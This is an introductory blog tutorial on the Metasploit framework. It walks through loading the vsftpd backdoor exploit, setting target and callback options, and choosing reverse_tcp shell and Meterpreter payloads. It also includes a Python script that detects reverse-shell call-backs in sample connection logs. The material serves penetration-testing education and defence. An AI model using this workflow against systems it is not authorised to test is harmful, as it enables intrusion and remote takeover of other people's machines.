How To Use Metasploit For Advanced Penetration Testing
Today we will have a look at Metasploit, one of the best exploitation frameworks. It is owned by Rapid7 and is integrated with many exploits for gaining access to the target system. Metasploit is written in Ruby and comes pre-packaged with many exploits, scanners and encoders that can perform different tasks. Metasploit has a large database of more than 2000 exploits related to all the protocol versions and also to Windows, Linux and much more.
Features:
1. It comes pre-packaged with Kali Linux and Parrot OS.
2. It is constantly updated and new exploits are added to it every 2 to 3 days.
3. It can also scan the target for open ports and for vulnerabilities. The modules that do this are called auxiliary modules.
4. Whenever an interesting exploit is discovered, it is soon added to the Metasploit Framework.
5. It also has an additional component called Meterpreter, which is a kind of shell with very advanced functionality.
6. It can be used for both exploitation and post-exploitation.
7. It also includes exploits related to Android devices, VoIP and other attacks.
8. It can also attack various IoT devices.
9. With msfvenom we can create a malicious payload which, when executed, can be used to gain access to our target machine.
Some Important Terms:
Exploit: It is a piece of code that triggers the vulnerability and successfully exploits it.
Payload: It is the piece of code that is run after the exploit has successfully executed on the victim. The payload can be made to gain a shell or to perform malicious tasks.
How to Use?
To launch Metasploit, type the command "msfconsole" in your terminal.
>>msfconsole
Metasploit will now load and greet us with a banner.
To change the banner we can use the banner command on the msf terminal.
msf> banner
To make the loading of Metasploit even faster we can start the PostgreSQL service.
>>service postgresql start
1. Search utility - search is used to search for strings such as
msf>search exploits - search for all the exploits
search MySQL - search for all exploits and auxiliary modules with the keyword MySQL.
search FTP - search for all modules having the word FTP
Like this we can search for exploits and auxiliary modules related to our needs.
2. Once you have decided which exploit you want to use, you have to select it. We can do that with the 'use' command.
msf>use exploit/unix/ftp/vsftpd_234_backdoor
This will load the specified exploit and you will notice that the exploit name is shown in red colour.
This is an indication that the exploit was successfully loaded.
3. Now we have to set the options the exploit needs in order to run. The options may include RHOST, LHOST, LPORT and sometimes a password, hashes or even wordlists.
LHOST = Local Host (your IP)
RHOST = Remote Host (victim IP)
show options = This will show you all the options you need to set for the exploit you just loaded to run properly.
Syntax to set a value: set <option> <value>
For example, set LHOST 182.168.45.33
set LPORT 4444
Similarly, we can set all the required options.
4. Now that all the options are set, it is time to set the payload, which will be executed when our exploit code succeeds.
To see all the available payloads, type "show payloads".
This lists all the payloads supported by the exploit we selected.
Use set payload <payload name> to set the payload.
Now everything is done and we are ready to run the exploit. Before that let's summarize:
1. Select an exploit
2. Show options
3. Set option
4. Show payload
5. Set payload
6. RUN !!
To run the exploit just type "run" or "exploit". If your target is vulnerable, the payload gets executed and performs its task.
The most common payloads are
windows/shell/reverse_tcp
windows/meterpreter/reverse_tcp
The above 2 payloads are used to get a shell on your Windows target if your exploit was successful.
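Seen from the defender's side, a reverse_tcp payload means the target host itself opens a connection back to LHOST on LPORT. The following is an added example, not part of the original article, that looks for that call-back in connection logs; the log format, the addresses, the internal range and the 60-second window are assumptions.

```python
import ipaddress
from datetime import datetime, timedelta

# Constructed sample: timestamp, source IP, destination IP, destination port.
# The log format and all addresses are assumptions made for this example.
SAMPLE_LOG = """\
2024-05-01T10:00:00 198.51.100.7 10.0.0.5 21
2024-05-01T10:00:03 10.0.0.5 198.51.100.7 4444
2024-05-01T10:05:00 10.0.0.8 203.0.113.9 443
2024-05-01T10:06:00 203.0.113.20 10.0.0.9 445
2024-05-01T10:30:00 10.0.0.9 203.0.113.20 8443
2024-05-01T11:00:00 10.0.0.12 203.0.113.50 4444
"""

INTERNAL_NET = ipaddress.ip_network("10.0.0.0/8")  # assumed internal range
DEFAULT_LPORT = 4444            # the LPORT value used in the article
WINDOW = timedelta(seconds=60)  # assumed max gap between exploit and call-back


def is_internal(addr):
    return ipaddress.ip_address(addr) in INTERNAL_NET


def parse(log):
    """Yield (time, src, dst, dport) for each non-empty log line."""
    for line in log.splitlines():
        if line.strip():
            ts, src, dst, dport = line.split()
            yield datetime.fromisoformat(ts), src, dst, int(dport)


def find_callbacks(log):
    """Return (host, peer, dport, reason) for suspicious outbound connections."""
    last_inbound = {}  # (internal host, external peer) -> time of last inbound
    alerts = []
    for ts, src, dst, dport in parse(log):
        if is_internal(dst) and not is_internal(src):
            last_inbound[(dst, src)] = ts
        elif is_internal(src) and not is_internal(dst):
            seen = last_inbound.get((src, dst))
            if seen is not None and ts - seen <= WINDOW:
                # Host dials back to a peer that just connected to it.
                alerts.append((src, dst, dport, "connect-back"))
            elif dport == DEFAULT_LPORT:
                alerts.append((src, dst, dport, "default-lport"))
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_LOG):
        print(alert)
```

The port check on its own is a weak signal because LPORT can be set to any value; the connect-back correlation does not depend on the port number.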
Metasploit is very vast, vaster than you can imagine! This was just a guide to make you familiar with Metasploit and with how to launch an attack from it.
There are also advanced ways to evade firewalls while attacking, and Meterpreter is itself a very vast post-exploitation topic, which we will not cover.
For more information about Metasploit, you can refer to the Offensive Security Metasploit Unleashed article to get a detailed guide about Metasploit and all its components.
There are also many auxiliary modules that I have not covered, but I hope that after reading this guide you can use them on your own from the above understanding, because the process is the same : )
Reference
Link: https://www.offensive-security.com/metasploit-unleashed/
- Dipanshu Pandey